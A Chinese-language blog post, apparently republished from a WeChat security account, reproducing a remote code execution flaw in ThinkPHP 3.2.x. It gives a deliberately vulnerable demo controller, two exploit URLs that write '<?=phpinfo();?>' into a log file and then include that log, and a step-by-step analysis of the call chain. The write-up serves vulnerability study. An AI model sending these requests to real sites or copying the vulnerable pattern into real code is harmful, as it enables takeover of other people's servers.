ThinkPHP3.2.x RCE漏洞复现

0x00 简介

ThinkPHP3.2的远程代码执行漏洞。该漏洞是在受影响的版本中，业务代码中如果模板赋值方法assign的第一个参数可控，则可导致模板文件路径变量被覆盖为携带攻击代码的文件路径，造成任意文件包含，执行任意代码。

环境

windows 10phpstudy 5.6Thinkphp 3.2.3完整版

0x01 复现过程
demo:

demo代码说明：如果需要测试请把demo代码放入对应位置,代码位置：ApplicationHomeControllerIndexController.class.php,因为程序要进入模板渲染方法方法中，所以需要创建对应的模板文件，内容随意，模板文件位置：ApplicationHomeViewIndex (View没有Index文件夹需要自己创建)





<?phpnamespace HomeController;use ThinkController;class IndexController extends Controller {    public function index($value=''){        $this->assign($value);        $this->display();    }}

0x02 利用步骤：

1. 创建log2. 包含log

创建log发送请求 注意，m=后面的code不要url编码，否则包含的时候会失败）
http://127.0.0.1/index.php?m=--><?=phpinfo();?>



包含log




http://127.0.0.1/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Home/21_07_12.log




Debug开启和关闭的路径不同:
开启: ApplicationRuntimeLogsCommon<log>关闭: ApplicationRuntimeLogsHome<log>

0x03 漏洞点分析
1.assign函数返回模板变量



2.到display函数开始解析



3.到达View.Class.php发现把payload传入到Hook::Listen函数



4.进入循环在将payload传入self::exec函数



5.调用BehaviorParseTemplateBehavior类 (将log文件写入缓存php)



6.调用fetch函数



最后load函数加载



(不会描述，原文章描述的很好)





参考链接https://mp.weixin.qq.com/s/_4IZe-aZ_3O2PmdQrVbpdQhttps://blog文章标题:ThinkPHP3.2.x RCE漏洞复现本文作者:九世发布时间:2021-07-12, 17:32:20最后更新:2021-07-12, 17:46:23原始链接:http://422926799.github.io/posts/94587123.html版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。


最后

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。


无害实验室拥有对此文章的修改和解释权如欲转载或传播此文章，必须保证此文章的完整性，包括版权声明等全部内容。未经作者允许，不得任意修改或者增减此文章内容，不得以任何方式将其用于商业目的



本文始发于微信公众号（无害实验室sec）：ThinkPHP3.2.x RCE漏洞复现